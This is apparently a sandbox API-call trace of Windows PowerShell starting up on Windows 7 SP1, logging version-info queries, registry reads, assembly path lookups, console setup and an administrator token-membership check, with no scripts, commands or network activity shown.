	[0131.610] lstrcpyW (in: lpString1=0x1b7a5d10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0131.610] CoTaskMemFree (pv=0x1b7a5d10) 
	[0131.610] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b518, puLen=0x14d9d0) returned 1
	[0131.610] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0131.610] CoTaskMemAlloc (cb=0x58) returned 0x19aea0
	[0131.610] lstrcpyW (in: lpString1=0x19aea0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0131.611] CoTaskMemFree (pv=0x19aea0) 
	[0131.611] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b594, puLen=0x14d9d0) returned 1
	[0131.611] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0131.611] CoTaskMemAlloc (cb=0x20) returned 0x25e490
	[0131.611] lstrcpyW (in: lpString1=0x25e490, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0131.611] CoTaskMemFree (pv=0x25e490) 
	[0131.611] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x2d5b23c, puLen=0x14d9d0) returned 1
	[0131.611] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0131.611] CoTaskMemAlloc (cb=0x66) returned 0x25ce50
	[0131.611] lstrcpyW (in: lpString1=0x25ce50, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0131.611] CoTaskMemFree (pv=0x25ce50) 
	[0131.611] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x0, puLen=0x14d9d0) returned 0
	[0131.611] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x0, puLen=0x14d9d0) returned 0
	[0131.611] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14d9d8, puLen=0x14d9d0 | out: lplpBuffer=0x14d9d8*=0x0, puLen=0x14d9d0) returned 0
	[0131.611] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d9a8, puLen=0x14d9a0 | out: lplpBuffer=0x14d9a8*=0x2d5b1e4, puLen=0x14d9a0) returned 1
	[0131.611] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0131.611] VerLanguageNameW (in: wLang=0x0, szLang=0x19eeb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0131.611] CoTaskMemFree (pv=0x19eeb0) 
	[0131.611] VerQueryValueW (in: pBlock=0x2d5b148, lpSubBlock="\\", lplpBuffer=0x14d9f8, puLen=0x14d9f0 | out: lplpBuffer=0x14d9f8*=0x2d5b170, puLen=0x14d9f0) returned 1
	[0131.622] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0131.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.622] CoTaskMemFree (pv=0x1b7a3d10) 
	[0131.623] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0131.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.624] CoTaskMemFree (pv=0x1b7a3d10) 
	[0131.625] lstrlenW (lpString="䅁") returned 1
	[0131.631] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d8c8 | out: phkResult=0x14d8c8*=0x314) returned 0x0
	[0131.632] RegOpenKeyExW (in: hKey=0x314, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d8b8 | out: phkResult=0x14d8b8*=0x318) returned 0x0
	[0131.632] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d948 | out: phkResult=0x14d948*=0x31c) returned 0x0
	[0131.638] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d88c, lpData=0x0, lpcbData=0x14d888*=0x0 | out: lpType=0x14d88c*=0x1, lpData=0x0, lpcbData=0x14d888*=0x56) returned 0x0
	[0131.640] CoTaskMemAlloc (cb=0x5a) returned 0x25cde0
	[0131.640] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d85c, lpData=0x25cde0, lpcbData=0x14d858*=0x56 | out: lpType=0x14d85c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d858*=0x56) returned 0x0
	[0131.640] CoTaskMemFree (pv=0x25cde0) 
	[0131.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.772] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0131.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.772] CoTaskMemFree (pv=0x1b7a3d10) 
	[0132.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0132.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0132.621] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3e20
	[0132.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.621] CoTaskMemFree (pv=0x1b7a3e20) 
	[0132.623] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3e20
	[0132.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.623] CoTaskMemFree (pv=0x1b7a3e20) 
	[0132.751] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3e20
	[0132.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.751] CoTaskMemFree (pv=0x1b7a3e20) 
	[0132.752] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3e20
	[0132.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.752] CoTaskMemFree (pv=0x1b7a3e20) 
	[0132.752] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3e20
	[0132.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.752] CoTaskMemFree (pv=0x1b7a3e20) 
	[0133.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0133.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0133.156] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3e20
	[0133.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.156] CoTaskMemFree (pv=0x1b7a3e20) 
	[0133.160] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3e20
	[0133.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.160] CoTaskMemFree (pv=0x1b7a3e20) 
	[0133.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0133.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0134.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0134.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0134.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0135.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0135.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0136.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0136.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0136.151] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0136.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.151] CoTaskMemFree (pv=0x1b7a4040) 
	[0136.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0136.648] SetErrorMode (uMode=0x1) returned 0x1
	[0136.649] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14d820 | out: lpFileInformation=0x14d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0136.649] SetErrorMode (uMode=0x1) returned 0x1
	[0137.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.825] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0137.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.825] CoTaskMemFree (pv=0x1b7a4040) 
	[0137.829] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0137.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.829] CoTaskMemFree (pv=0x1b7a4040) 
	[0137.829] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0137.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.829] CoTaskMemFree (pv=0x1b7a4040) 
	[0137.832] CoCreateGuid (in: pguid=0x14dbe8 | out: pguid=0x14dbe8*(Data1=0xae47fdee, Data2=0xb680, Data3=0x417f, Data4=([0]=0x9b, [1]=0x3d, [2]=0xac, [3]=0xbe, [4]=0x52, [5]=0x9, [6]=0x51, [7]=0xa1))) returned 0x0
	[0137.836] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0137.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.836] CoTaskMemFree (pv=0x1b7a4040) 
	[0137.839] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0137.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.839] CoTaskMemFree (pv=0x1b7a4040) 
	[0137.842] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0137.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.842] CoTaskMemFree (pv=0x1b7a4040) 
	[0137.849] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0137.945] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14d890 | out: lpConsoleScreenBufferInfo=0x14d890) returned 1
	[0137.952] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0137.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14d890 | out: lpConsoleScreenBufferInfo=0x14d890) returned 1
	[0137.954] GetVersionExW (in: lpVersionInformation=0x14d820*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d820*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0137.957] GetCurrentProcess () returned 0xffffffffffffffff
	[0137.959] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14d8b8 | out: TokenHandle=0x14d8b8*=0x334) returned 1
	[0137.961] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d7d8 | out: TokenInformation=0x0, ReturnLength=0x14d7d8) returned 0
	[0137.963] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1a82e0
	[0137.963] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x1a82e0, TokenInformationLength=0x4, ReturnLength=0x14d7d8 | out: TokenInformation=0x1a82e0, ReturnLength=0x14d7d8) returned 1
	[0137.965] DuplicateTokenEx (in: hExistingToken=0x334, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14d938 | out: phNewToken=0x14d938*=0x330) returned 1
	[0137.965] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d7d8 | out: TokenInformation=0x0, ReturnLength=0x14d7d8) returned 0
	[0137.965] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1a8310
	[0137.965] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x1a8310, TokenInformationLength=0x4, ReturnLength=0x14d7d8 | out: TokenInformation=0x1a8310, ReturnLength=0x14d7d8) returned 1
	[0137.966] CheckTokenMembership (in: TokenHandle=0x330, SidToCheck=0x2e35ef0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14d948 | out: IsMember=0x14d948) returned 1
	[0137.967] CloseHandle (hObject=0x330) returned 1
	[0137.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
